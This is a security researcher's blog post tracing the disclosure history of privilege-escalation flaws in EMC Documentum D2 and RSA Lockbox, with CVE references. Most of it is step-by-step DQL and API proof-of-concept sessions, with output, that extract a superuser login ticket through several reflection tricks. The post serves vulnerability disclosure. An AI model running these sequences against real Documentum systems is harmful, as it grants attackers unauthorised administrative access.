Say goodbuy LockBox. Part II

Wow, interesting news came from where I didn’t expect: ECN guys states that EMC have stopped torturing customers and gave up the idea of using RSA Lockbox.

Here’s a little history of the Lockbox story that you might want to read:

November 2013

Reported to EMC using support portal, proof of concept how authenticated user was able to gain superuser privileges:

1> create c6_method_return object set message='test' 
2> go 
object_created 
-------------- 
00002ee280000e9b 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b' 
3> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002ee280000e9b' 
2> go 
message 
-------------- 
DM_TICKET=T0..... 
(1 row affected)

January 2014

EMC released Document D2 v 4.2 and some patches for previous versions, no CVE announced. The EMC “solution” was to encrypt data passed through c6_method_return objects

February 2014

Discovered a reflection attack on D2GetAdminTicketMethod method:

1> create c6_method_return object set message='test' 
2> go 
object_created 
---------------- 
00002f0a8000291d 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global -timeout 3600' 
4> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- now message contains encrypted data 
--- 
message 
---------------------------------------------------------------------------- 
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2 
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b 
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+ 
... 
(1 row affected)
1> update c6_method_return object 
2> set parameter_name[0]='-timeout', 
3> set parameter_value[0]=(select message from c6_method_return 
4> where r_object_id='00002f0a8000291d') 
5> where r_object_id='00002f0a8000291d' 
6> go 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global' 
4> go 
... 
(1 row affected) 

1> select error from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- Here NumberFormatException occurs and unencrypted ticked is written 
--- to error field of c6_method_return object 
--- 
error 
---------------------------------------------------------------------------- 
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ 
(1 row affected)

March 2014

EMC released P01 patch for EMC Documentum D2 v4.2, no CVE announced. The vendor “solution” was not to store exception messages into “error” attribute of c6_method_return object if exception message contains “DM_TICKET” character sequence.

April 2014

Discovered another reflection attack based on verbose logging of D2GetAdminTicketMethod:

API> create,c,c6_method_return 
... 
000224838000011f 
API> save,c,l 
... 
OK 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global 
-timeout 3600 
' 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
API> revert,c,000224838000011f 
... 
OK 
API> get,c,000224838000011f,message 
... 
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2 
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L 
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D 
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT 
... 

API> ?,c,update c6_method_return object 
set parameter_name[0]='-timeout', 
set parameter_value[0]=(select message from c6_method_return 
where r_object_id='000224838000011f') 
where r_object_id='000224838000011f' 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

--- 
--- Here we put extra parameter "SAVE_RESULTS,B,T" to save execution results 
--- of D2GetAdminTicketMethod docbase method 
--- 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global -timeout 3600 
', 
SAVE_RESULTS,B,T 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0902248380002a67 
result_doc_id : 0902248380002a67 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
--- 
--- Now message contains encrypted data and error is empty 
--- 
API> get,c,000224838000011f,message 
... 
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3 
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb 
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC 
... 
--- 
--- But execution results do contain unencrypted ticket 
--- 
API> get,c,000224838000011f,error 
... 

API> getpath,c,0902248380002a67 
... 
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt 
API> quit 
Bye 
~]$ cat content_storage_01/00022483/80/00/09/e1.txt 
==== START ======================================================= 
D2-API v4.2.0010 build 378 
DFC version : 7.1.0020.0120 
file.encoding : UTF-8 
Arguments : {-docbase_name=d2, 
-method_return_id=000224838000011f, 
-password=, 
-class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
-scope=global, 
-timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp.... 
} 
-Scope : global 
-TimeOut : 3600 
-SingleUse : true 
==== END (0.095s) ================================================

August 2014

EMC announced CVE-2014-2515, the solution was intended to mitigate previously described reflection attacks

August 2014

Discovered another set of vulnerabilities in implementation of “protection” of D2GetAdminTicketMethod method. The basic idea was: attacker was able to delete any file from CS filesystem, and in case of deletion of Lockbox file D2 started to use default passphrase (i.e. com.emc.d2.api.utils.GetCryptedPassword)

August 2014

EMC announced CVE-2015-4537

February 2015

I got tired and proved that RSA Lockbox is not a security solution: RSA LOCKBOX MAGIC 🙂.

Check and mate.

6 thoughts on “Say goodbuy LockBox. Part II

  1. I think everybody will not miss the LockBox (especially all the related manual, installation tasks…).

    Like

  2. Pingback: To sell or not to sell… | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s